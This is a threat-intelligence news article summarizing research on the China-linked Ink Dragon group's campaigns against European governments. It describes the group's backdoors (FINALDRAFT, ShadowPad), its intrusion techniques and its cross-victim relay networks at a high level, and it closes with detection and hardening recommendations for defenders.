China-Linked Ink Dragon APT Targets European Governments with ShadowPad

A sophisticated China-nexus threat actor known as Ink Dragon has escalated operations targeting European government institutions since July 2025, according to new research from Check Point. The group's campaigns demonstrate advanced tradecraft and a concerning ability to create interconnected attack infrastructure spanning multiple victim organizations.

An Established Threat With Many Names

The threat group operates under multiple tracking designations across the security industry: Ink Dragon, Jewelbug, CL-STA-0049, Earth Alux, and REF7707. Active since at least March 2023, the group has impacted several dozen victims including government entities and telecommunications organizations across Europe, Asia, and Africa.

Check Point researchers note the actors demonstrate "solid software engineering, disciplined operational playbooks" and excel at blending into enterprise environments by leveraging legitimate tools alongside custom malware.

Sophisticated Malware Arsenal

The group deploys a diverse toolkit of custom and shared malware, with two primary backdoors forming the backbone of their operations:

FINALDRAFT (Squidoor)

This cross-platform backdoor affects both Windows and Linux systems. The enhanced variant observed in recent campaigns includes improved stealth capabilities and data exfiltration features. Notably, the malware abuses Microsoft's Outlook email platform and Graph API for command-and-control communications, allowing malicious traffic to blend with legitimate Office 365 activity.

The modular framework uses encoded command documents to direct infected systems, providing flexibility for operators to deploy additional capabilities as needed.

ShadowPad

A well-known backdoor previously associated with Chinese intelligence operations, ShadowPad is deployed through a custom IIS Listener module that transforms compromised web servers into command-and-control infrastructure nodes. This technique enables traffic proxying across multiple victim networks, significantly complicating attribution and response efforts.

Supporting Tools

The group's toolkit also includes:

• NANOREMOTE: Uses Google Drive API for file operations and exfiltration
• Cobalt Strike: The ubiquitous penetration testing framework repurposed for malicious operations
• VARGEIT: Additional backdoor capability
• LalsDumper and 032Loader: Tools for credential theft and payload execution

Attack Methodology

Ink Dragon gains initial access by exploiting vulnerable internet-exposed web applications. Observed techniques include ASP.NET ViewState deserialization attacks leveraging predictable machine keys, as well as exploitation of SharePoint vulnerabilities.

Once inside target networks, operators deploy web shells to deliver additional payloads and establish persistence through scheduled tasks and Windows services. Host firewall rules are modified to permit command-and-control communications.

Lateral movement relies heavily on RDP tunneling using credentials extracted from compromised systems. The group conducts extensive credential harvesting through LSASS memory dumps and registry hive extraction, enabling domain-wide access in targeted organizations.

Building Relay Networks

Perhaps the most concerning aspect of Ink Dragon operations is their construction of relay networks that span multiple victim organizations. Check Point researchers explain that compromised hosts are converted into infrastructure nodes, enabling attackers to "route traffic not only deeper inside a single organization's network, but also across different victim networks entirely."

This approach provides several advantages: it obscures the true origin of attacks, provides redundancy if individual nodes are discovered, and allows operators to maintain access even if one victim organization detects and remediates the intrusion.

Notable Campaign Details

Researchers documented a particularly sophisticated intrusion targeting a Russian IT service provider that lasted five months. During this operation, attackers demonstrated patience and tradecraft by:

• Reusing authentication tokens from idle Domain Administrator RDP sessions
• Exfiltrating NTDS.dit database files and registry hives, enabling offline cracking of all domain credentials
• Establishing persistence mechanisms that survived system reboots and security tool updates

The investigation also revealed concurrent activity with another China-linked group tracked as REF3927 (RudePanda) on shared victims, suggesting possible coordination or resource sharing between different Chinese intelligence units.

Implications for European Security

The escalation of Ink Dragon operations against European government targets represents a significant intelligence collection effort. While the specific objectives remain unclear, government entities typically possess sensitive information about policy decisions, diplomatic communications, and strategic planning that would be valuable to foreign intelligence services.

Defensive Recommendations

Organizations potentially targeted by sophisticated nation-state actors should consider:

Detection Focus Areas:

• Monitor for unusual Outlook and Graph API activity patterns
• Alert on web shell deployment and ASP.NET deserialization attacks
• Track anomalous RDP connection patterns, especially involving administrative accounts
• Monitor for LSASS access and credential dumping indicators

Hardening Measures:

• Implement network segmentation to limit lateral movement
• Deploy application allowlisting on critical systems
• Ensure ASP.NET machine keys are unique per application
• Restrict and monitor administrative account usage
• Implement robust logging with off-network storage

The sophistication and persistence demonstrated by Ink Dragon underscore the asymmetric challenge faced by defenders: while attackers only need to succeed once, defenders must maintain vigilance continuously across an ever-expanding attack surface.